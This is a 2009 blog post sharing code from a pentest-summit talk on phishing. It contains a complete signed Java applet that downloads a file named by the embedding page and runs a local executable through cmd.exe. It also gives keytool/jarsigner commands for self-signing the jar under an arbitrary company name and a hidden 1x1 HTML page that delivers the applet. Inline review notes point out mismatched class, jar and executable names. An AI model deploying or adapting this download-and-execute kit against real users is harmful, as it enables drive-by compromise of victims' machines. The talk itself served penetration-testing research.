Friday, June 19, 2009

MetaPhish - Pentest Summit 2009

These guys did a cool presentation at the SANS pentest summit 09.

Val Smith (valsmith@attackresearch.com)
Colin Ames (amesc@attackresearch.com)
David Kerb (dkerb@attackresearch.com)

Here is some of the code from the presentation: a signed Java applet that downloads a file from a URL supplied as an applet parameter and then runs a local executable. The jar is self-signed, so the attack depends on the victim clicking through the signed-applet warning; an unsigned applet would be stopped by the sandbox before it could write to disk or spawn a process. Thanks guys!!!

import java.applet.Applet;
import java.io.*;
import java.net.*;
import java.io.IOException;
/**
 * Applet used in the MetaPhish demo: on load it downloads a file from the
 * URL given by the "URI" applet parameter to the path given by the
 * "LOCALFILE" parameter, then runs a fixed local executable via cmd.exe.
 *
 * Both parameters come from the embedding HTML page (getParameter), so the
 * page author controls what is fetched and where it is written. Writing to
 * disk and calling Runtime.exec need more than sandbox permissions, which is
 * why the accompanying keytool/jarsigner steps sign the jar; unsigned, the
 * applet security manager would refuse both calls.
 *
 * NOTE(review): the executable run by cmd() is hard-coded to c:\met.exe and
 * is not the LOCALFILE path that downloadURL() just wrote; the two have to
 * be kept in sync by hand (the sample HTML below uses c:\data.exe).
 */
public class WebDispApp extends Applet {
public WebDispApp() { }
/**
 * Browser entry point: fetch the payload, then launch cmd.exe.
 * cmd() runs even when the download failed, because downloadURL() catches
 * every exception internally and reports nothing back.
 */
public void init() { downloadURL(); cmd();
} /* end public void init */
/**
 * Copies the resource at applet parameter "URI" to the local path in applet
 * parameter "LOCALFILE", creating or truncating that file.
 *
 * Any exception (bad or missing URI, missing LOCALFILE, network or file
 * error) is printed to stderr and otherwise ignored; the caller cannot tell
 * success from failure. The byte counter numWritten is accumulated but never
 * read. No size limit is applied to the download.
 */
public void downloadURL() {
OutputStream out = null;
URLConnection conn = null;
InputStream in = null;
try {
String geturi = getParameter("URI");
URL url = new URL(geturi);
String localfile = getParameter("LOCALFILE");
/* Destination path is taken verbatim from the page; no normalisation. */
out = new BufferedOutputStream(
new FileOutputStream(localfile));
conn = url.openConnection();
in = conn.getInputStream();
byte[] buffer = new byte[1024];
int numRead;
long numWritten = 0;
/* Plain copy loop; stops only at end of stream. */
while ((numRead = in.read(buffer)) != -1) {
out.write(buffer, 0, numRead);
numWritten += numRead;
} /* end while */
} /* end try */
catch (Exception exception) {
/* Swallows everything, including the "no protocol"/null cases above. */
exception.printStackTrace();
} /* end catch */
finally {
try {
if (in != null) {
in.close();
} /* end if */
if (out != null) {
out.close();
} /* end if */
} /* end try */
catch (IOException ioe) { } /* close failures are deliberately ignored */
} /* end finally */
} /* end public void downloadURL */
/**
 * Launches the payload: runs "cmd.exe /c c:\met.exe" through Runtime.exec.
 * The Process handle is discarded without waiting, so the applet neither
 * blocks on nor observes the child; an IOException (for example cmd.exe or
 * met.exe not found) is silently swallowed. Windows-only by construction.
 */
public void cmd() {
Process process;
try {
process =
Runtime.getRuntime().exec("cmd.exe /c c:\\met.exe");
} /* end try */
catch(IOException ioexception) { } /* failure to launch is not reported */
} /* end public void cmd */
} /* end public class */


# 1. Create a self-signed code-signing key "signFiles" in a new keystore.
#    Nothing here is issued by a CA: the "Company Name" in -dname is whatever
#    the signer types, and it is presumably the publisher name the Java
#    security prompt shows the victim. The store and key passwords are
#    passed on the command line, so they end up in shell history.
keytool -genkey -alias signFiles -keystore msfkeystore -storepass msfstorepass -dname "cn=Company Name" -keypass msfkeypass

# 2. Sign the applet jar with that key, producing sWebDispApp.jar.
#    A signed jar that the user accepts is what lets the applet write files
#    and call Runtime.exec outside the sandbox.
jarsigner -keystore msfkeystore -storepass msfstorepass -keypass msfkeypass -signedjar sWebDispApp.jar WebDispApp.jar signFiles

# 3. Export the self-signed certificate to a file.
keytool -export -keystore msfkeystore -storepass msfstorepass -alias signFiles -file MetaPhishLLC.cer

# 4. Re-import that same certificate into the same keystore under a second
#    alias ("company"). NOTE(review): the keystore already holds this
#    certificate via "signFiles", so this step is not needed for signing.
keytool -import -alias company -file MetaPhishLLC.cer -keystore msfkeystore -storepass msfstorepass

<html>
<body>
<!-- Minimal carrier page for the signed applet. The 1x1 size keeps it
     visually hidden; the two PARAMs are read by WebDispApp.downloadURL()
     through getParameter("URI") and getParameter("LOCALFILE"). -->
<!-- NOTE(review): the names here do not match the listing above. The class
     is WebDispApp, not MetaPhish.class, and jarsigner wrote sWebDispApp.jar,
     not sMetaPhish.jar. The applet also executes the hard-coded c:\met.exe,
     not this LOCALFILE value. HTML does not treat a backslash as an escape,
     so the literal value handed to the applet is c:\\data.exe. -->
<APPLET code="MetaPhish.class" archive="sMetaPhish.jar" width="1" height="1">
<PARAM NAME="URI" VALUE="http://127.0.0.1/calc.exe">
<PARAM NAME="LOCALFILE" VALUE="c:\\data.exe">
</APPLET>
</body>
</html>
